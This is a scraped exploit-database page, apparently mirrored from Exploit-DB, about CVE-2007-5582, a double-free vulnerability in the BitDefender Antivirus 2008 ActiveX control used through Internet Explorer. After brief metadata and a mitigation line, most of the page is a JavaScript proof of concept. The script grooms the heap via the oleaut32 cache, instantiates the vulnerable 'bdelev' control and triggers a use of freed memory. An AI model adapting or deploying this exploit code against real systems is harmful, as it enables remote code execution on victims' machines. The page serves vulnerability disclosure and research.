Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
BitDefender Antivirus 2008 ActiveX Control Double-Free Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
BitDefender Antivirus
by:
Unknown
7.5
CVSS
HIGH
Double-Free Vulnerability
415
CWE
Product Name: BitDefender Antivirus
Affected Version From: BitDefender Antivirus 2008
Affected Version To: BitDefender Antivirus 2008
Patch Exists: NO
Related CWE: CVE-2007-5582
CPE: a:bitdefender:antivirus:2008
Metasploit:
Other Scripts:
Platforms Tested: Windows
2007

BitDefender Antivirus 2008 ActiveX Control Double-Free Vulnerability

A BitDefender Antivirus 2008 ActiveX control is prone a double-free vulnerability because of a flaw in the way that the 'bdelev.dll' library handles certain object data prior to returning it. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Mitigation:

Update to a newer version of BitDefender Antivirus or switch to a different antivirus solution.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26824/info

A BitDefender Antivirus 2008 ActiveX control is prone a double-free vulnerability because of a flaw in the way that the 'bdelev.dll' library handles certain object data prior to returning it.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

this.Oleaut32 = new Array();
this.Oleaut32["cache"] = new Array();
this.base = "A";
while (base.length<0x8000) base+= base;
this.base = base.substring (0, (0x8000-6)/2);
CollectGarbage();
3
// Fill the cache with block of maximum size
for (i=0;i<6;i++)
{
this.Oleaut32["cache"].push(base.substring (0, (0x20-6)/2));
this.Oleaut32["cache"].push(base.substring (0, (0x40-6)/2));
this.Oleaut32["cache"].push(base.substring (0, (0x100-6)/2));
this.Oleaut32["cache"].push(base.substring (0, (0x8000-6)/2));
}
this.bitdefender = new ActiveXObject('bdelev.ElevatedHelperClass.1');
// free cache of oleaut32
delete Oleaut32["cache"];
CollectGarbage();
// POC
for (pid=0;pid<4000;pid+=4)
{
try
{
// Find first Module_Path
var Module_Path = bitdefender.Proc_GetName_PSAPI (pid);
// Display the original string in free block memory
///////////////////////////////////////////////////
alert (Module_Path); -> C:\Windows\... (exemple)
/////////////////////
// Uses free block
var y = base.substring(0,Module_Path.length);
// Display the result of the crushing of the memory
///////////////////////////////////////////////////
alert (Module_Path); -> AAAAAAAAAAAA...
/////////////////////
break;
}
catch(e) {}
}

Navigation

Suggest Exploit

Services By CQR